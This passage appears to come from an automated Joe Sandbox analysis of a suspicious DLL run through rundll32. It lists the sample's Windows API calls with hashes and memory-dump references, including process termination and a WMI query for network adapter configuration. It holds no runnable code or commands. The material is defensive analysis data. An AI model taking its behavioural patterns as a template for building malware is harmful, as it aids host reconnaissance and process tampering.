                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,72657672,000000FF,00000000,00000002,00000000,00000000,1001A365,654E5F32,00000000,00000000,10006735,00000000), ref: 100113D4
                                      • GetLastError.KERNEL32 ref: 100113E4
                                      • GetLastError.KERNEL32 ref: 100113EA
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.3770418235.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000003.00000002.3770357167.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.3770418235.0000000010021000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.3770418235.0000000010032000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.3770573661.0000000010034000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.3770592041.0000000010035000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                      Similarity
                                      • API ID: ErrorLast$ByteCharD262MultiWidewcslen
                                      • String ID:
                                      • API String ID: 893356176-0
                                      • Opcode ID: afd18ee60ff2b0ce0bcd15a358cca37ac97d015ba3010c487c48ccea99233302
                                      • Instruction ID: 23fc2d8bcf316ea6a60e3ca9b5905811bbe2b2d5fdf9053c8a10922eaeb712a0
                                      • Opcode Fuzzy Hash: afd18ee60ff2b0ce0bcd15a358cca37ac97d015ba3010c487c48ccea99233302
                                      • Instruction Fuzzy Hash: C8F0C862204156BED214E6764C84DEB768CDB856F97124239F564DE441E935DC8181B1
                                      APIs
                                      • lstrlen.KERNEL32(00000000,?,00000000,00000000,1000A74F,?,Win32_NetworkAdapterConfiguration), ref: 10011332
                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000001), ref: 10011359
                                      • GetLastError.KERNEL32(?,00000001), ref: 10011369
                                      • GetLastError.KERNEL32(?,00000001), ref: 1001136F
                                      • SysAllocString.OLEAUT32 ref: 10011386
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.3770418235.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000003.00000002.3770357167.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.3770418235.0000000010021000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.3770418235.0000000010032000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.3770573661.0000000010034000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.3770592041.0000000010035000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                      Similarity
                                      • API ID: ErrorLast$AllocByteCharMultiStringWidelstrlen
                                      • String ID:
                                      • API String ID: 4196186757-0
                                      • Opcode ID: 5bddbd93c25bf412b4bb809baaa78ed8b84148b2e51b7ba0785a3fcadd1d5036
                                      • Instruction ID: 1697f759eb40de09af1bc61be908fb19387247674bfb87126e23a115f11a360f
                                      • Opcode Fuzzy Hash: 5bddbd93c25bf412b4bb809baaa78ed8b84148b2e51b7ba0785a3fcadd1d5036
                                      • Instruction Fuzzy Hash: 5801F472500126F7D710DB60CC05BDE3FA8EF413A1F204130FD54DA0A4E734D6A186E1
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.3770418235.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000003.00000002.3770357167.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.3770418235.0000000010021000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.3770418235.0000000010032000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.3770573661.0000000010034000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.3770592041.0000000010035000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                      Similarity
                                      • API ID: strrchr$DirectoryPath
                                      • String ID: 123
                                      • API String ID: 307107200-2286445522
                                      • Opcode ID: 50724f86c3f4088a4114f505fbd4048a7a26bc2a5139918f545a1dec1e3d9f9d
                                      • Instruction ID: 52565608425bb8163d1a49b4138d7fd17ec815c5c5898e6c317b6dd2e097079f
                                      • Opcode Fuzzy Hash: 50724f86c3f4088a4114f505fbd4048a7a26bc2a5139918f545a1dec1e3d9f9d
                                      • Instruction Fuzzy Hash: C63149756043482FF350D234AC46B7B37C8DB81261F400629FD96872C2EE7BE9498252
                                      APIs
                                      • SetFilePointer.KERNEL32(?,00000000,00000000,00000001,?,?,?,00000000), ref: 1000FE59
                                      • SetFilePointer.KERNEL32(?,00000000,00000000,00000000), ref: 1000FE86
                                      • GetLocalTime.KERNEL32(?), ref: 1000FEC0
                                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 1000FED0
                                        • Part of subcall function 1000F7D0: GetFileInformationByHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,1000FE77,?), ref: 1000F7DE
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.3770418235.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000003.00000002.3770357167.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.3770418235.0000000010021000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.3770418235.0000000010032000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.3770573661.0000000010034000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.3770592041.0000000010035000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                      Similarity
                                      • API ID: File$Time$Pointer$HandleInformationLocalSystem
                                      • String ID:
                                      • API String ID: 3986731826-0
                                      • Opcode ID: 61a0087d423c09f97422bc83c9848e8916b95916cdb9e4ba8520c2658471a079
                                      • Instruction ID: 17b5fe91996c6261312ccb9e4e6132c54d30cb61b07fd2e13d415d5cbc7ebe71
                                      • Opcode Fuzzy Hash: 61a0087d423c09f97422bc83c9848e8916b95916cdb9e4ba8520c2658471a079
                                      • Instruction Fuzzy Hash: D04151B1504B459FE320DF29C88096BF7E8FF89354F408A2EF59A83A51D371E909CB61
                                      APIs
                                      • InterlockedDecrement.KERNEL32(00000008), ref: 1000AEA4
                                      • SysFreeString.OLEAUT32(00000000), ref: 1000AEB9
                                      • 6D262DD0.MFC42(0000000C,761DE610,00000000,?,00000000,1001182B,000000FF,1000ADF0,?,00000008,?), ref: 1000AEE0
                                      • SysAllocString.OLEAUT32(?), ref: 1000AF0E
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.3770418235.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000003.00000002.3770357167.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.3770418235.0000000010021000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.3770418235.0000000010032000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.3770573661.0000000010034000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.3770592041.0000000010035000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                      Similarity
                                      • API ID: String$AllocD262DecrementFreeInterlocked
                                      • String ID:
                                      • API String ID: 2797009911-0
                                      • Opcode ID: 2d8dce3105b6f9f3431049397acffbae998695e77875ebfd0e65080e84b591e4
                                      • Instruction ID: 467ef8a558da28dbcad68d4755d69a1ff26c6b184be9d6db0a0de4f2a60c8ced
                                      • Opcode Fuzzy Hash: 2d8dce3105b6f9f3431049397acffbae998695e77875ebfd0e65080e84b591e4
                                      • Instruction Fuzzy Hash: 3521AEB6A006529BE350CF19C845B57B7E8FB48B90F00863DF949D7244E778E884C7A1
                                      APIs
                                      • OpenProcess.KERNEL32(001F0FFF,00000000,00000000,?,1000575A,?,?,?,00000000), ref: 100056BD
                                      • TerminateProcess.KERNEL32(00000000,00000000,?,?,00000000), ref: 100056CC
                                      • CloseHandle.KERNEL32(00000000,?,?,00000000), ref: 100056D7
                                      • CloseHandle.KERNEL32(00000000,?,?,00000000), ref: 100056E4
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.3770418235.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000003.00000002.3770357167.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.3770418235.0000000010021000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.3770418235.0000000010032000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.3770573661.0000000010034000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.3770592041.0000000010035000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                      Similarity
                                      • API ID: CloseHandleProcess$OpenTerminate
                                      • String ID:
                                      • API String ID: 6823918-0
                                      • Opcode ID: ba73f2dd624f0828aa206dd07c4a16fe15200f4358f6e993a6f0722e7fc0aad8
                                      • Instruction ID: f7b4e055ffd599d9e0c47c3f774a3c979061384f2bf10b9864beb156a07e91a2
                                      • Opcode Fuzzy Hash: ba73f2dd624f0828aa206dd07c4a16fe15200f4358f6e993a6f0722e7fc0aad8
                                      • Instruction Fuzzy Hash: 37E0C2752022306FF6626774AC4DBAB3694EF0CB52F024200F906D6186C631CC91C6A1
                                      APIs
                                      • 6D262DD0.MFC42(0000000C,00000000,00000000,?,00000000,1001178B,000000FF,10009E98,ROOT\CIMV2), ref: 1000A7BC
                                      • SysAllocString.OLEAUT32(?), ref: 1000A7EA
                                      Strings
                                      • Win32_NetworkAdapterConfiguration, xrefs: 1000A7D6
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.3770418235.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000003.00000002.3770357167.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.3770418235.0000000010021000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.3770418235.0000000010032000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.3770573661.0000000010034000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.3770592041.0000000010035000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                      Similarity
                                      • API ID: AllocD262String
                                      • String ID: Win32_NetworkAdapterConfiguration
                                      • API String ID: 3327814304-4052814535
                                      • Opcode ID: dcc9387750b85e72be689dce455b3cb1c3cd05c30fd87c59f8a4494969a60326
                                      • Instruction ID: 5be8eb74ec117bd519112317e2f5b517d8065636beee4e0cb4edc012c64f21ac
                                      • Opcode Fuzzy Hash: dcc9387750b85e72be689dce455b3cb1c3cd05c30fd87c59f8a4494969a60326
                                      • Instruction Fuzzy Hash: 2501B572500651DBE310CF58C845B56B6E4FB45FA4F20872DF9549B390D7B8D885C7D2
                                      APIs
                                      • InterlockedDecrement.KERNEL32(00000008), ref: 1000A9DE
                                      • SysFreeString.OLEAUT32(00000000), ref: 1000A9F3
                                      Strings
                                      • Win32_NetworkAdapterConfiguration, xrefs: 1000A9D1
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.3770418235.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000003.00000002.3770357167.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.3770418235.0000000010021000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.3770418235.0000000010032000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.3770573661.0000000010034000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.3770592041.0000000010035000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                      Similarity
                                      • API ID: DecrementFreeInterlockedString
                                      • String ID: Win32_NetworkAdapterConfiguration
                                      • API String ID: 3298718523-4052814535
                                      • Opcode ID: 21f08bbe9eaea59fddc26aeedd3f048849ab0ef83c9e535bffb6afc4ff47bb10
                                      • Instruction ID: a533a0eff511bb94dcfba7d21632d8268cd47a76a31a49f1588e4cd0f422ce33
                                      • Opcode Fuzzy Hash: 21f08bbe9eaea59fddc26aeedd3f048849ab0ef83c9e535bffb6afc4ff47bb10
                                      • Instruction Fuzzy Hash: 8AF0A0B6B0122257E660DA25A904B4773DCEF02A80B020538FC45E7249E734EC81C691